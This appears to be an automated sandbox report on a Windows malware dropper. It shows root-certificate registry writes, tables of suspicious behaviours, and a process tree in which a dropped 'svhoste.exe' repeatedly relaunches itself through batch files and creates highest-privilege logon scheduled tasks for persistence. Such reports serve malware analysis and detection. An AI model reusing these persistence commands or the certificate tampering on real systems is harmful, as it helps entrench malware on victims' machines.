5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe -
Runs ping.exe 1 TTPs 12 IoCs
pid Process 3964 PING.EXE 3548 PING.EXE 1848 PING.EXE 3812 PING.EXE 992 PING.EXE 2916 PING.EXE 3968 PING.EXE 3248 PING.EXE 4484 PING.EXE 2436 PING.EXE 3580 PING.EXE 744 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6108 schtasks.exe 2796 schtasks.exe 2784 schtasks.exe 2700 schtasks.exe 3352 schtasks.exe 3424 schtasks.exe 3324 schtasks.exe 2128 schtasks.exe 3364 schtasks.exe 3532 schtasks.exe 2500 schtasks.exe 5668 schtasks.exe 316 schtasks.exe 3148 schtasks.exe 2096 schtasks.exe 4436 schtasks.exe 3788 schtasks.exe 2940 schtasks.exe 6812 schtasks.exe 904 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2080 powershell.exe 1924 powershell.exe 1208 chrome.exe 1208 chrome.exe 2688 2572212193.exe 3040 1334316928.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 3376 1229421168.exe 3376 1229421168.exe 440 powershell.exe 3376 1229421168.exe 3376 1229421168.exe 2332 winupsecvmgr.exe 2332 winupsecvmgr.exe 908 powershell.exe 2332 winupsecvmgr.exe 2332 winupsecvmgr.exe 2332 winupsecvmgr.exe 2332 winupsecvmgr.exe 3696 setup8.exe 872 neonn.exe 872 neonn.exe 2464 MSBuild.exe 3692 svchost.exe 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif 2832 Boxing.pif -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 1712 chrome.exe 2352 testme.exe 1456 SteamDetector.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 2652 sysklnorbcv.exe 3296 sysmablsvr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2372 4363463463464363463463463.exe Token: SeDebugPrivilege 2816 svhoste.exe Token: SeDebugPrivilege 1588 svhoste.exe Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 664 svhoste.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeDebugPrivilege 2688 2572212193.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeDebugPrivilege 3040 1334316928.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeDebugPrivilege 1220 svhoste.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeShutdownPrivilege 1208 chrome.exe Token: SeAssignPrimaryTokenPrivilege 2008 820810029.exe Token: SeBackupPrivilege 2008 820810029.exe Token: SeDebugPrivilege 2008 820810029.exe Token: 36 2008 820810029.exe Token: SeImpersonatePrivilege 2008 820810029.exe Token: SeIncBasePriorityPrivilege 2008 820810029.exe Token: SeIncreaseQuotaPrivilege 2008 820810029.exe Token: 33 2008 820810029.exe Token: SeManageVolumePrivilege 2008 820810029.exe Token: SeProfSingleProcessPrivilege 2008 820810029.exe Token: SeRestorePrivilege 2008 820810029.exe Token: SeSecurityPrivilege 2008 820810029.exe Token: SeSystemProfilePrivilege 2008 820810029.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1208 chrome.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe 1508 dwm.exe -
Suspicious use of SetWindowsHookEx 38 IoCs
pid Process 1588 svhoste.exe 664 svhoste.exe 1220 svhoste.exe 1712 chrome.exe 3036 svhoste.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 3052 svhoste.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1840 svhoste.exe 2896 svhoste.exe 1712 chrome.exe 1712 chrome.exe 2464 MSBuild.exe 3692 svchost.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 1712 chrome.exe 3116 svhoste.exe 5648 svhoste.exe 5372 svhoste.exe 5964 RegAsm.exe 2480 XClient.exe 6272 svhoste.exe 4880 PaoNan.exe 4880 PaoNan.exe 4880 PaoNan.exe 6000 svhoste.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2816 2372 4363463463464363463463463.exe 33 PID 2372 wrote to memory of 2816 2372 4363463463464363463463463.exe 33 PID 2372 wrote to memory of 2816 2372 4363463463464363463463463.exe 33 PID 2372 wrote to memory of 2816 2372 4363463463464363463463463.exe 33 PID 2816 wrote to memory of 316 2816 svhoste.exe 34 PID 2816 wrote to memory of 316 2816 svhoste.exe 34 PID 2816 wrote to memory of 316 2816 svhoste.exe 34 PID 2816 wrote to memory of 1588 2816 svhoste.exe 36 PID 2816 wrote to memory of 1588 2816 svhoste.exe 36 PID 2816 wrote to memory of 1588 2816 svhoste.exe 36 PID 1588 wrote to memory of 2796 1588 svhoste.exe 37 PID 1588 wrote to memory of 2796 1588 svhoste.exe 37 PID 1588 wrote to memory of 2796 1588 svhoste.exe 37 PID 2372 wrote to memory of 2348 2372 4363463463464363463463463.exe 41 PID 2372 wrote to memory of 2348 2372 4363463463464363463463463.exe 41 PID 2372 wrote to memory of 2348 2372 4363463463464363463463463.exe 41 PID 2372 wrote to memory of 2348 2372 4363463463464363463463463.exe 41 PID 2348 wrote to memory of 2196 2348 twztl.exe 42 PID 2348 wrote to memory of 2196 2348 twztl.exe 42 PID 2348 wrote to memory of 2196 2348 twztl.exe 42 PID 2348 wrote to memory of 2196 2348 twztl.exe 42 PID 2372 wrote to memory of 2392 2372 4363463463464363463463463.exe 43 PID 2372 wrote to memory of 2392 2372 4363463463464363463463463.exe 43 PID 2372 wrote to memory of 2392 2372 4363463463464363463463463.exe 43 PID 2372 wrote to memory of 2392 2372 4363463463464363463463463.exe 43 PID 1588 wrote to memory of 3024 1588 svhoste.exe 44 PID 1588 wrote to memory of 3024 1588 svhoste.exe 44 PID 1588 wrote to memory of 3024 1588 svhoste.exe 44 PID 3024 wrote to memory of 3008 3024 cmd.exe 46 PID 3024 wrote to memory of 3008 3024 cmd.exe 46 PID 3024 wrote to memory of 3008 3024 cmd.exe 46 PID 3024 wrote to memory of 2436 3024 cmd.exe 47 PID 3024 wrote to memory of 2436 3024 cmd.exe 47 PID 3024 wrote to memory of 2436 3024 cmd.exe 47 PID 2196 wrote to memory of 2448 2196 sysppvrdnvs.exe 48 PID 2196 wrote to memory of 2448 2196 sysppvrdnvs.exe 48 PID 2196 wrote to memory of 2448 2196 sysppvrdnvs.exe 48 PID 2196 wrote to memory of 2448 2196 sysppvrdnvs.exe 48 PID 2196 wrote to memory of 1692 2196 sysppvrdnvs.exe 49 PID 2196 wrote to memory of 1692 2196 sysppvrdnvs.exe 49 PID 2196 wrote to memory of 1692 2196 sysppvrdnvs.exe 49 PID 2196 wrote to memory of 1692 2196 sysppvrdnvs.exe 49 PID 2448 wrote to memory of 2080 2448 cmd.exe 52 PID 2448 wrote to memory of 2080 2448 cmd.exe 52 PID 2448 wrote to memory of 2080 2448 cmd.exe 52 PID 2448 wrote to memory of 2080 2448 cmd.exe 52 PID 1692 wrote to memory of 2628 1692 cmd.exe 53 PID 1692 wrote to memory of 2628 1692 cmd.exe 53 PID 1692 wrote to memory of 2628 1692 cmd.exe 53 PID 1692 wrote to memory of 2628 1692 cmd.exe 53 PID 1692 wrote to memory of 348 1692 cmd.exe 54 PID 1692 wrote to memory of 348 1692 cmd.exe 54 PID 1692 wrote to memory of 348 1692 cmd.exe 54 PID 1692 wrote to memory of 348 1692 cmd.exe 54 PID 1692 wrote to memory of 1660 1692 cmd.exe 55 PID 1692 wrote to memory of 1660 1692 cmd.exe 55 PID 1692 wrote to memory of 1660 1692 cmd.exe 55 PID 1692 wrote to memory of 1660 1692 cmd.exe 55 PID 1692 wrote to memory of 2000 1692 cmd.exe 56 PID 1692 wrote to memory of 2000 1692 cmd.exe 56 PID 1692 wrote to memory of 2000 1692 cmd.exe 56 PID 1692 wrote to memory of 2000 1692 cmd.exe 56 PID 1692 wrote to memory of 1500 1692 cmd.exe 57 PID 1692 wrote to memory of 1500 1692 cmd.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:316
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2796
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\U04yuqxtX6bd.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:3008
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2436
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:664 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2128
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ItSTVVu8y9Ad.bat" "7⤵PID:2996
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1436
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:992
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1220 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2784
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\pFW6zZ9J8A9U.bat" "9⤵PID:2592
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:2960
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2916
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3036 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:3148
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\DrDn0KciLIhW.bat" "11⤵PID:3540
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:3584
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3580
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3052 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:2700
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\aQISEX3P4FYR.bat" "13⤵PID:1952
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3884
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3968
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"14⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1840 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:2096
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\2Q1ilIknCiI7.bat" "15⤵PID:3168
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3068
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:744
-
-
